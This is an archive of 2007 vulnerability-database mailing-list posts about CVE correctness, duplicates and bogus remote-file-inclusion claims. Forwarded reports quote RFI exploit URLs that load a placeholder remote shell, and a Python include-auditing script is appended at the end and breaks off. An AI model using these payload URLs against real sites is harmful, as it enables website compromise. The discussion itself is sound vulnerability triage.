From jericho at attrition.org Thu Mar 1 23:39:12 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 1 Mar 2007 23:39:12 -0500 (EST)
Subject: [VIM] phpProfiles vendor ack
Message-ID:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6740

http://linuxwebshop.com/forum/viewtopic.php?t=40

Posted: Fri Dec 22, 2006 2:11 pm
Post subject: Security Alert

Hackers have found a way to exploit the script the way it is written. We use variables that are defined in config.php for some of the include paths. Since the script is open source, a hacker is able to download the script and learn the names given to these variables (i.e. $incpath, $usrinc, etc.). The hacker then uses the variables to call code from their server.

The solution will be to change all of the include variables to absolute paths:

include("$usrinc/body.inc.php");

to

include("include/body.inc.php");

etc ...

The fix will involve some time to complete. Until then, while we took down the demo we did leave the download up in case someone wants to use the script & make the modifications themselves.

More about the issue is available at:
http://www.securityfocus.com/bid/21667/discuss

From jericho at attrition.org Fri Mar 2 03:08:37 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 2 Mar 2007 03:08:37 -0500 (EST)
Subject: [VIM] Valdersoft Shopping Cart - follow-up
Message-ID:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6691

Since the product isn't free, I was checking to see if the three different common.php files mentioned were all the same, or attempt to determine it via the demo on the vendor's web site. When loading them, one only yields a blank page (common_include/common.php) and the other two resulted in a path disclosure when calling the files directly. So as best I can tell, at least one of the files may be different than the rest, or may require some form of additional access.
http://www.valdersoft.com/store/include/common.php
http://www.valdersoft.com/store/admin/include/common.php

From f.riphagen at nsec.nl Fri Mar 2 15:14:21 2007
From: f.riphagen at nsec.nl (Ferdy Riphagen)
Date: Fri, 02 Mar 2007 21:14:21 +0100
Subject: [VIM] [Fwd: SPAW Editor PHP Edition]
Message-ID: <45E8859D.8020908@nsec.nl>

The file mentioned here is only a patch.

img_library.php contains:

// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

With an install you have to rename "../config/spaw_control.default.config.php" to "../config/spaw_control.config.php"

spaw_control.config.php contains:

// calculate root folder for spaw files
$spaw_root = realpath(dirname(__FILE__)."/..");
$spaw_root = str_replace("\\","/",$spaw_root);
if (!ereg('/$', $spaw_root)) $spaw_root = $spaw_root."/";

The patch is for the "zend_hash_del_key_or_index" vulnerability by using the hashes for "spaw_imglib_include" (-86707544, -411170602)

--Ferdy--

-------- Original Message --------

Remote Include File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4
Discovered By : Hasadya Raed
Contact Me : RaeD[at]BsdMail[dot]Com
Download Script: http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip

B.File :img_library.php :

include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=

Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK]

By Hasadya Raed

--
_______________________________________________
Get your free email from http://bsdmail.com

From coley at linus.mitre.org Fri Mar 2 15:35:35 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 2 Mar 2007 15:35:35 -0500 (EST)
Subject: [VIM] [Fwd: SPAW Editor PHP Edition]
In-Reply-To: <45E8859D.8020908@nsec.nl>
References: <45E8859D.8020908@nsec.nl>
Message-ID:

By the way, it's been on my to-do list to investigate other disclosures involving $spaw_root in other products; looks like SPAW Editor is included in other products.

CVE-2006-5459 - Download-Engine
CVE-2006-5291 - Download-Engine
CVE-2006-4656 - Web Provence SL_Site
CVE-2006-2928 - CMS-Bandits
CVE-2006-2519 - phpwcms

It kinda bugs me when it takes us 5 CVE's to realize that we might be dealing with a third-party component :-/

spaw_control.class.php is most frequently mentioned, but other files are mentioned too. Some of these files might be glue code for the specific product.

- Steve

From coley at mitre.org Fri Mar 2 15:50:32 2007
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 2 Mar 2007 15:50:32 -0500 (EST)
Subject: [VIM] Lameness Disclaimer
Message-ID: <200703022050.l22KoW5T018925@faron.mitre.org>

from Bugtraq "WordPress Search Function SQL-Injection"

http://www.securityfocus.com/archive/1/461473/100/0/threaded

| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)

Naturally, the post (maybe a forced SQL error at most) has two followups with inability to reproduce.
- Steve

From jericho at attrition.org Fri Mar 2 19:22:18 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 2 Mar 2007 19:22:18 -0500 (EST)
Subject: [VIM] [Fwd: SPAW Editor PHP Edition]
In-Reply-To:
References: <45E8859D.8020908@nsec.nl>
Message-ID:

: By the way, it's been on my to-do list to investigate other disclosures
: involving $spaw_root in other products; looks like SPAW Editor is
: included in other products.

From: security curmudgeon
To: OSVDB Mods
Cc: Steven Christey
Date: Mon, 27 Nov 2006 06:37:24 -0500 (EST)
Reply-To: moderators at osvdb.org
Subject: [OSVDB Mods] omg omg SPAW

I sent this mail out just days before I got slammed with work and never got around to looking at it in more detail. This was specifically over spaw_control.class.php being found vulnerable in a number of packages.

: CVE-2006-5459 - Download-Engine
: CVE-2006-5291 - Download-Engine
: CVE-2006-4656 - Web Provence SL_Site
: CVE-2006-2928 - CMS-Bandits
: CVE-2006-2519 - phpwcms

OSVDB 26368
AWF CMS spaw_control.class.php spaw_root Variable Remote File Inclusion

OSVDB 18155
Website Generator spaw_control.class.php Direct Request Path Disclosure

From coley at linus.mitre.org Fri Mar 2 21:58:23 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 2 Mar 2007 21:58:23 -0500 (EST)
Subject: [VIM] [Fwd: SPAW Editor PHP Edition]
In-Reply-To:
References: <45E8859D.8020908@nsec.nl>
Message-ID:

> From: security curmudgeon
> To: OSVDB Mods
> Cc: Steven Christey
> Date: Mon, 27 Nov 2006 06:37:24 -0500 (EST)
> Subject: [OSVDB Mods] omg omg SPAW

Wow, I barely remember that email. I must admit that we have some issues with "institutional memory," e.g. codebase relationships, which CVE's need some kind of tweak, etc.

> OSVDB 26368
> AWF CMS spaw_control.class.php spaw_root Variable Remote File Inclusion
>
> OSVDB 18155
> Website Generator spaw_control.class.php Direct Request Path Disclosure

Path disclosure eh?
Smells like insufficient diagnosis to me :)

- Steve

From coley at linus.mitre.org Sat Mar 3 15:09:30 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sat, 3 Mar 2007 15:09:30 -0500 (EST)
Subject: [VIM] Neohapsis face lift
Message-ID:

For those of you who do automatic scrubbing...

>The Neohapsis Archives have undergone a face lift. Please let us know if
>you notice any issues.

ex:

http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0299.html

And there's a search utility on the front page... or was that always there?

- Steve

From jericho at attrition.org Sat Mar 3 18:29:18 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 3 Mar 2007 18:29:18 -0500 (EST)
Subject: [VIM] Neohapsis face lift
In-Reply-To:
References:
Message-ID:

: For those of you who do automatic scrubbing...
:
: >The Neohapsis Archives have undergone a face lift. Please let us know if
: >you notice any issues.
:
: ex:
:
: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0299.html
:
: And there's a search utility on the front page... or was that always
: there?

It was always there. Just a hook into using Google to search their archives.

From coley at mitre.org Sat Mar 3 21:22:54 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 3 Mar 2007 21:22:54 -0500 (EST)
Subject: [VIM] Novell BorderManager ISAKMP issue smells like a dupe
Message-ID: <200703040222.l242Msn5021430@faron.mitre.org>

Refs:

https://secure-support.novell.com/KanisaPlatform/Publishing/201/3003139_f.SAL_Public.html
(CVE forthcoming)

and

http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974551.htm
CVE-2006-5286

All the vuln DB's have created separate ID's for these advisories. CVE-2006-5286 was released in Oct 2006, and the other was released in Nov 2006. Both references point to bmvpnsec1.exe as a patch, and so does the CONFIRM in this item. However, 3003139 does not reference TID2974551, CVE-2006-5286, or any other item that can prove a correlation between the two.
In addition, 3003139 mentions other more serious impacts that were not in TID2974551. So, who knows whether these are really the same or not.

- Steve

From coley at mitre.org Sat Mar 3 21:30:11 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 3 Mar 2007 21:30:11 -0500 (EST)
Subject: [VIM] Keyword Replacer plugin RFI seems to be fixed
Message-ID: <200703040230.l242UBa6021607@faron.mitre.org>

Ref: http://milw0rm.com/exploits/2528

Vector: addon_keywordreplacer.php?pathToFiles

SECUNIA:22401 states "the vulnerability is confirmed in the release from 29/05/2006."

Downloading the ZIP file mentioned in the disclosure, we see that addon_keywordreplacer.php is dated Oct 25, 2006 - about 2 weeks after the initial milw0rm post. The first line is now:

if (!defined('INCLUDED776')) die ('Fatal error.');

I don't have an older version to compare it to, so I don't know if the original disclosure was just grep-and-gripe.

- Steve

From steve at vitriol.net Mon Mar 5 10:41:59 2007
From: steve at vitriol.net (Steve Tornio)
Date: Mon, 05 Mar 2007 09:41:59 -0600
Subject: [VIM] CVE-2007-0028
Message-ID: <45EC3A47.8010706@vitriol.net>

http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html

I don't think this reference belongs in the entry, as I don't see any link between the Excel vulnerability and the WMF flaw referenced in the link. If I missed it, please correct me.

Thanks,
Steve
osvdb.org

From steve at vitriol.net Mon Mar 5 10:47:54 2007
From: steve at vitriol.net (Steve Tornio)
Date: Mon, 05 Mar 2007 09:47:54 -0600
Subject: [VIM] CVE-2007-0028
In-Reply-To: <45EC3A47.8010706@vitriol.net>
References: <45EC3A47.8010706@vitriol.net>
Message-ID: <45EC3BAA.7060307@vitriol.net>

Steve Tornio wrote:
> http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html
>
> I don't think this reference belongs in the entry, as I don't see any
> link between the Excel vulnerability and the WMF flaw referenced in the
> link. If I missed it, please correct me.
>

Replying to myself to add another one:

This mail list post is referenced:
http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded

However, the content of that post explicitly states that the Excel issues including CVE-2007-0028 are not relevant.

MS Patch - MS07-002 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (927198)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue

Thanks,
Steve

From coley at linus.mitre.org Mon Mar 5 11:33:52 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 5 Mar 2007 11:33:52 -0500 (EST)
Subject: [VIM] CVE-2007-0028
In-Reply-To: <45EC3A47.8010706@vitriol.net>
References: <45EC3A47.8010706@vitriol.net>
Message-ID:

On Mon, 5 Mar 2007, Steve Tornio wrote:

> http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html
>
> I don't think this reference belongs in the entry, as I don't see any
> link between the Excel vulnerability and the WMF flaw referenced in the
> link. If I missed it, please correct me.

This is a good example of why I plan to make CVE's analysis field public at some point. See below for what happened.

ALSO NOTE - the advisory that's returned on "FG-2006-30" is actually labeled as FGA-2005-17 and talks about that WMF issue from December 2005. So there's clearly something wrong with their web site on this, probably as a result of the advisory name switch. I filled out the form at http://www.fortiguardcenter.com/sendfeedback.php under "Report a broken link or network issue". Maybe someone else could fill out a similar complaint in a different category to maximize the chance of success...

- Steve

======================================================
Name: CVE-2006-3432
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3432
Acknowledged:
Announced:
Flaw:

** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2007-0028.
Reason: This candidate is a reservation duplicate of CVE-2007-0028. The original assigner switched to a new CVE number. Notes: All CVE users should reference CVE-2007-0028 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.

======================================================
Name: CVE-2007-0028
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0028
Acknowledged: yes advisory
Announced: 20070109
Flaw: unk

Reference: MISC:http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html
Reference: MISC:http://www.fortinet.com/FortiGuardCenter/advisory/FGA-2007-01.html
Reference: HP:HPSBST02184
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded
Reference: HP:SSRT071296
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/457274/100/0/threaded
Reference: MS:MS07-002
Reference: URL:http://www.microsoft.com/technet/security/Bulletin/MS07-002.mspx
Reference: CERT:TA07-009A
Reference: URL:http://www.us-cert.gov/cas/techalerts/TA07-009A.html
Reference: CERT-VN:VU#493185
Reference: URL:http://www.kb.cert.org/vuls/id/493185
Reference: BID:21952
Reference: URL:http://www.securityfocus.com/bid/21952
Reference: FRSIRT:ADV-2007-0103
Reference: URL:http://www.frsirt.com/english/advisories/2007/0103
Reference: SECTRACK:1017485
Reference: URL:http://securitytracker.com/id?1017485
Reference: SECUNIA:23676
Reference: URL:http://secunia.com/advisories/23676

Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0027 should be used.
Analysis:
ACCURACY: FG-2006-30 was originally published and used CVE-2006-3432, but Microsoft had updated all CVEs to 2007 numbers before disclosure. After MS07-002 was published, FG-2006-30 was changed to FGA-2007-01, and used the new CVE-2007-0027 identifier.

From coley at linus.mitre.org Mon Mar 5 12:55:31 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 5 Mar 2007 12:55:31 -0500 (EST)
Subject: [VIM] CVE-2007-0028
In-Reply-To: <45EC3A47.8010706@vitriol.net>
References: <45EC3A47.8010706@vitriol.net>
Message-ID:

Steve,

Looks like they fixed it nice and quick :) It now forwards to FGA-2007-01.

> http://www.fortinet.com/FortiGuardCenter/advisory/FG-2006-30.html

- Steve

From dm at securityfocus.com Wed Mar 7 18:02:04 2007
From: dm at securityfocus.com (dm at securityfocus.com)
Date: Wed, 7 Mar 2007 16:02:04 -0700
Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot]
Message-ID: <20070307230204.GT17103@securityfocus.com>

One of our analysts looked at this and determined that it was bogus, here were their notes:

$include_path = dirname(__FILE__);
require_once $include_path.'/admin/config.inc.php';
require_once $include_path.'/lib/mysql.class.php';
require_once $include_path.'/lib/image.class.php';
require_once $include_path.'/lib/template.class.php';
require_once $include_path.'/lib/session.class.php';
require_once $include_path.'/lib/admin.class.php';

the vulnerable parameter 'include_path' is defined.
Not vuln

----- Forwarded message from c_r_ck at hotmail.com -----

From: c_r_ck at hotmail.com
Subject: Lazarus Guestbook (admin.php)Remote File Include Expliot
To: bugtraq at securityfocus.com
Date: 7 Mar 2007 23:23:05 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070307232305.1765.qmail at securityfocus.com>

# Lazarus Guestbook (admin.php)Remote File Include Expliot
# D.Script: http://www.carbonize.co.uk
# Dork: "Powered by Lazarus Guestbook from carbonize.co.uk"
# Discovered by Crack_man
# Homepage: http://www.b0rizq.biz
# Greetz To :B0rizq & red_casper & Draknaz kaiba & broken_proxy and all friends
# Exploit:
# [VicTim]/[path]/admin.php?include_path=shell.txt?cmd
===========================

----- End forwarded message -----

--
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

From coley at linus.mitre.org Wed Mar 7 18:41:54 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 7 Mar 2007 18:41:54 -0500 (EST)
Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot]
In-Reply-To: <20070307230204.GT17103@securityfocus.com>
References: <20070307230204.GT17103@securityfocus.com>
Message-ID:

On Wed, 7 Mar 2007 dm at securityfocus.com wrote:

> require_once $include_path.'/admin/config.inc.php';

I've noticed that extract() and similar variable overwrites frequently occur in config files. Was admin/config.inc.php and others checked for these kinds of issues that might overwrite $include_path?

- Steve

From jericho at attrition.org Thu Mar 8 18:40:37 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 8 Mar 2007 18:40:37 -0500 (EST)
Subject: [VIM] NO monthly MS security bulletins coming in March (fwd)
Message-ID:

The calm before the storm?
=)

---------- Forwarded message ----------
From: Juha-Matti Laurio
X-Originating-IP: 88.115.116.156
To: funsec at linuxbox.org
Date: Thu, 8 Mar 2007 22:43:11 +0200 (EET)
Subject: [funsec] NO monthly MS security bulletins coming in March

Believe it or not...

According to Microsoft Security Bulletin Advance Notification Program
http://www.microsoft.com/technet/security/bulletin/advance.mspx
_no new_ Microsoft Security Bulletins will be released on March 13, 2007 (i.e. the scheduled, monthly "Black Tuesday").

An updated version of Microsoft Windows Malicious Software Removal Tool is coming, however.

- Juha-Matti

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

From rkeith at securityfocus.com Fri Mar 9 10:54:40 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Fri, 9 Mar 2007 08:54:40 -0700 (MST)
Subject: [VIM] [false-report] [saw_xyz@yahoo.com: wwwpaintboar(newsfile) Remote File Inclusion Vulnerability] (fwd)
Message-ID:

The vendor page and the product name don't exist (according to Google). Changing it to wwwpaintboard (adding a D) however does reveal a product. That software also has the reported script and parameter. But, the script also calls a config.php file which clearly defines the parameter.

http://obiewebsite.sourceforge.net/obie.php?WWW_Paint_Board

So, presuming that is the correct software, it is a false report.
--
Rob Keith
Symantec

----- Forwarded message from saw_xyz at yahoo.com -----

From: saw_xyz at yahoo.com
Subject: wwwpaintboar(newsfile) Remote File Inclusion Vulnerability
To: bugtraq at securityfocus.com
Date: 9 Mar 2007 10:43:48 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070309104348.24662.qmail at securityfocus.com>

> wwwpaintboar(newsfile) Remote File Inclusion Vulnerability
> -----------------------------------------------------------
> Version : 1.0
> Website URL: http://phpforge.oirac.com/
> -----------------------------------------------------------
> Discovered by saw_xyz (sasan)
> [XIII Security Researcher]
> Gr33tZ t0 :Snake
> My Home : www.saw13.com
> fuck ahsyane st an davood [ashy member]
> -----------------------------------------------------------
> Vulnerable codeZ is in editor.php
> in line 261 :
>
> -----------------------------------------------------------
> Ex:
> http://127.0.0.1/%5bpatch%5d/editor.php?newsfile=%5bevil script]

----- End forwarded message -----

--
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

From coley at mitre.org Sat Mar 10 15:58:58 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 10 Mar 2007 15:58:58 -0500 (EST)
Subject: [VIM] OpenBSD mbuf issue upgraded to "security"
Message-ID: <200703102058.l2AKwwAG017934@faron.mitre.org>

Ref: SECTRACK:1017735

Thought I'd mention this for the vdb's who don't report reliability problems.

Issue was originally reported by OpenBSD as a RELIABILITY FIX and crash, as archived in SECTRACK:1017735, but the errata has since been changed/upgraded to security fix.
Reference: http://www.openbsd.org/errata39.html#m_dup1
Reference: http://www.openbsd.org/errata40.html#m_dup1

This is CVE-2007-1365

- Steve

From nikns at secure.lv Sat Mar 10 16:29:51 2007
From: nikns at secure.lv (Nikns Siankin)
Date: Sat, 10 Mar 2007 23:29:51 +0200
Subject: [VIM] OpenBSD mbuf issue upgraded to "security"
In-Reply-To: <200703102058.l2AKwwAG017934@faron.mitre.org>
References: <200703102058.l2AKwwAG017934@faron.mitre.org>
Message-ID: <20070310212951.GA27181@secure.lv>

UPDATE: this has been elevated to a security issue. Using pf(4) to "block in inet6" is an effective workaround until the patch can be installed.

http://undeadly.org/cgi?action=article&sid=20070308154628&mode=expanded

On Sat, Mar 10, 2007 at 03:58:58PM -0500, Steven M. Christey wrote:
>
>Ref: SECTRACK:1017735
>
>Thought I'd mention this for the vdb's who don't report reliability
>problems.
>
>Issue was originally reported by OpenBSD as a RELIABILITY FIX and
>crash, as archived in SECTRACK:1017735, but the errata has since been
>changed/upgraded to security fix.
>
>Reference: http://www.openbsd.org/errata39.html#m_dup1
>Reference: http://www.openbsd.org/errata40.html#m_dup1
>
>This is CVE-2007-1365
>
>- Steve

From jericho at attrition.org Sat Mar 10 23:19:50 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 10 Mar 2007 23:19:50 -0500 (EST)
Subject: [VIM] Exploit selling service up and running (fwd)
Message-ID:

From the site:

The vulnerabilities displayed on this website are not allowed to be put into any kind of exploit/vulnerability repositories.

---------- Forwarded message ----------
From: kingcope
To: full-disclosure at lists.grok.org.uk
Date: Sun, 11 Mar 2007 03:35:16 +0100
Subject: [Full-disclosure] Exploit selling service up and running

Hello List,

This is Kingcope. We now have our Exploit selling site up and running. On www.com-winner.com you can purchase quality advisories and exploits. Feel free to contact our sales person for getting the latest Zero-Days.
Best Regards,
kingcope
com-winner.com Research Team

From theall at tenablesecurity.com Mon Mar 12 20:11:48 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 12 Mar 2007 16:11:48 -0400
Subject: [VIM] Remote File Include In ClipShare.v1.5.3
Message-ID: <45F5B404.7010203@tenablesecurity.com>

Has anyone been able to verify this (http://archives.neohapsis.com/archives/bugtraq/2007-03/0118.html)? The source for this app isn't publicly available, but I've looked at copies of adodb-connection.inc.php included in other apps and all are implemented as a PHP class, with no ability to call it directly and get anything like a remote file include.

In addition, while the code does use '$cmd', it's in a call to exec() rather than include(), and its value does not seem at first blush to be under an attacker's control.

Methinks deaR aydasaH has things a bit backwards.

George
--
theall at tenablesecurity.com

From jericho at attrition.org Mon Mar 12 20:25:36 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 12 Mar 2007 20:25:36 +0000 (UTC)
Subject: [VIM] Oracle and CIA
Message-ID:

Regarding the Jan CPU from Oracle:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

Did anyone notice that several of the vulnerabilities listed apparently do not impact Confidentiality, Integrity -or- Availability? Mistake/oversight, or something else?

DB10, DB11, DB12, DB13, etc

From theall at tenablesecurity.com Mon Mar 12 20:43:27 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 12 Mar 2007 16:43:27 -0400
Subject: [VIM] Oracle and CIA
In-Reply-To:
References:
Message-ID: <45F5BB6F.4050600@tenablesecurity.com>

On 03/12/07 16:25, security curmudgeon wrote:
> Regarding the Jan CPU from Oracle:
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
>
> Did anyone notice that several of the vulnerabilities listed apparently
> do not impact Confidentiality, Integrity -or- Availability?
> Mistake/oversight, or something else?
>
> DB10, DB11, DB12, DB13, etc

There's a note below the table that clarifies those scores as representing "problems that are not exploitable in a default database environment".

There's been some discussion of Oracle's scoring methodology on the CVSS-SIG mailing list. Hopefully now that they've joined the SIG, these sorts of issues will fade away.

George
--
theall at tenablesecurity.com

From jericho at attrition.org Mon Mar 12 20:44:54 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 12 Mar 2007 20:44:54 +0000 (UTC)
Subject: [VIM] Oracle and CIA
In-Reply-To: <45F5BB6F.4050600@tenablesecurity.com>
References: <45F5BB6F.4050600@tenablesecurity.com>
Message-ID:

: > Regarding the Jan CPU from Oracle:
: > http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
: >
: > Did anyone notice that several of the vulnerabilities listed apparently do
: > not impact Confidentiality, Integrity -or- Availability? Mistake/oversight,
: > or something else?
: >
: > DB10, DB11, DB12, DB13, etc
:
: There's a note below the table that clarifies those scores as
: representing "problems that are not exploitable in a default database
: environment".

As always, firing off mails before reading the entire thing =)

: There's been some discussion of Oracle's scoring methodology on the
: CVSS-SIG mailing list. Hopefully now that they've joined the SIG, these
: sorts of issues will fade away.

Good.
Just because it doesn't exist in a default setup doesn't mean the vulnerability magically no longer affects C, I or A.

From str0ke at milw0rm.com Mon Mar 12 21:49:49 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 12 Mar 2007 15:49:49 -0600
Subject: [VIM] Remote File Include In ClipShare.v1.5.3
In-Reply-To: <45F5B404.7010203@tenablesecurity.com>
References: <45F5B404.7010203@tenablesecurity.com>
Message-ID: <814b9d50703121449m6a684349o8c19229f94ee87f1@mail.gmail.com>

haha, I have stopped checking his work due to the amount of false positives.

/str0ke

On 3/12/07, George A. Theall wrote:
> Has anyone been able to verify this
> (http://archives.neohapsis.com/archives/bugtraq/2007-03/0118.html)? The
> source for this app isn't publicly available, but I've looked at
> copies of adodb-connection.inc.php included in other apps and all are
> implemented as a PHP class, with no ability to call it directly and get
> anything like a remote file include.
>
> In addition, while the code does use '$cmd', it's in a call to exec()
> rather than include(), and its value does not seem at first blush to be
> under an attacker's control.
>
> Methinks deaR aydasaH has things a bit backwards.
>
> George
> --
> theall at tenablesecurity.com
>

From jericho at attrition.org Wed Mar 14 08:14:55 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 14 Mar 2007 08:14:55 +0000 (UTC)
Subject: [VIM] Apple megapatch plugs 45 security holes (fwd)
Message-ID:

http://news.com.com/Apple+megapatch+plugs+45+security+holes/2100-1002_3-6166971.html

By Joris Evers
Staff Writer, CNET News.com
March 13, 2007

Apple on Tuesday issued a security update for its Mac OS X to plug 45 security holes, including several zero-day vulnerabilities.

The megapatch is the seventh Apple security patch release in three months. It deals with vulnerabilities in Apple's own software, as well as third-party components such as Adobe Systems' Flash Player, OpenSSH and MySQL.
Sixteen of the vulnerabilities addressed by the update were previously released as part of two high-profile bug-hunting campaigns.

The vulnerabilities pose varying risks to Macs. Several of the flaws could be exploited to gain full control over a Mac running the vulnerable component, according to Apple's advisory. Other holes are limited and could only be exploited to crash a Mac or used by somebody who already has access to a machine to elevate privileges, for example.

One focus of the patch is to fix eight vulnerabilities in the way Mac OS X handles disk images, files that when opened appear as a drive within the Macintosh Finder. Mounting a malicious image may lead to an error and could provide a means for an attacker to breach a Mac, Apple said.

Tuesday's update deals with nine vulnerabilities released as part of the Month of Apple Bugs in January and seven bugs disclosed in the Month of Kernel Bugs in November. In earlier fix releases, Apple fixed several flaws identified during the projects.

While several of the vulnerabilities repaired by Apple's updates were previously known, it doesn't appear that any attacks that exploited the flaws actually occurred.

In addition to the Mac OS X patch, Apple issued a second update on Tuesday to fix a security bug in iPhoto that could expose Mac users to a serious attack. An attacker could craft a malicious "photocast" which, when opened, could compromise a Mac, Apple said in its alert. The Photocasts feature allows people to share pictures in iPhoto.

Tuesday's two releases bring Apple's total patch count for the year to seven. Microsoft, meanwhile, on Tuesday skipped its monthly patch day. However, it released a dozen security bulletins with fixes for 20 vulnerabilities in February and four bulletins with fixes for 10 bugs in January.

The Apple patch can be downloaded and installed via the Software Update feature in Mac OS X, or from Apple Downloads.
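Several of the file-inclusion threads earlier in this archive (the Lazarus Guestbook and wwwpaintboard false reports, Steve's question about extract() in config files, the SPAW $spaw_root discussion) come down to one triage check: is the variable used in an include/require path assigned before use in that file, and could anything between the assignment and the include clobber it? The Python below is an added example written for this archive, not code from any of the products or posters. It scans PHP source text for variable-based includes and reports, per include, whether the variable was assigned earlier in the same file, never assigned in the file (so it must come from an included config, or from the request itself if register_globals is on), or assigned but followed by an extract()/parse_str()/import_request_variables() call that could overwrite it. The three sample sources are constructed to mirror the snippets quoted in the threads; the "possible-overwrite" sample is hypothetical.

```python
import re

# include/require whose path expression begins with a variable, e.g.
#   include $spaw_root.'class/util.class.php';
#   include("$usrinc/body.inc.php");
INCLUDE_RE = re.compile(
    r"\b(include|require)(_once)?\s*\(?\s*[\"']?\$(\w+)", re.IGNORECASE)
# Plain assignment:  $include_path = dirname(__FILE__);  (not ==)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")
# Calls that can (re)define local variables from request data.
OVERWRITE_RE = re.compile(
    r"\b(extract|parse_str|import_request_variables)\s*\(", re.IGNORECASE)


def audit_includes(php_source):
    """Return [(line_no, variable, verdict)] for each variable-based include.

    verdicts:
      'defined-before-use'  assigned earlier in this file, nothing suspicious after
      'undefined-in-file'   never assigned here: set by an included file, or by
                            the request itself when register_globals is on
      'possible-overwrite'  assigned here, but extract()/parse_str()/... runs
                            after the assignment and before the include
    """
    events = []  # (line_no, column, kind, name), later sorted into source order
    for line_no, line in enumerate(php_source.splitlines(), 1):
        code = line.split("//", 1)[0]  # drop // comments (naive: also cuts URLs)
        for m in ASSIGN_RE.finditer(code):
            events.append((line_no, m.start(), "assign", m.group(1)))
        for m in OVERWRITE_RE.finditer(code):
            events.append((line_no, m.start(), "overwrite", m.group(1)))
        for m in INCLUDE_RE.finditer(code):
            events.append((line_no, m.start(), "include", m.group(3)))
    events.sort(key=lambda e: (e[0], e[1]))

    assigned_at = {}      # variable -> position of its latest assignment
    last_overwrite = None # position of the latest overwrite-capable call
    findings = []
    for line_no, col, kind, name in events:
        if kind == "assign":
            assigned_at[name] = (line_no, col)
        elif kind == "overwrite":
            last_overwrite = (line_no, col)
        elif name not in assigned_at:
            findings.append((line_no, name, "undefined-in-file"))
        elif last_overwrite is not None and last_overwrite > assigned_at[name]:
            findings.append((line_no, name, "possible-overwrite"))
        else:
            findings.append((line_no, name, "defined-before-use"))
    return findings


# Constructed samples (not the real files), mirroring snippets quoted in the threads.
LAZARUS_LIKE = """<?php
$include_path = dirname(__FILE__);
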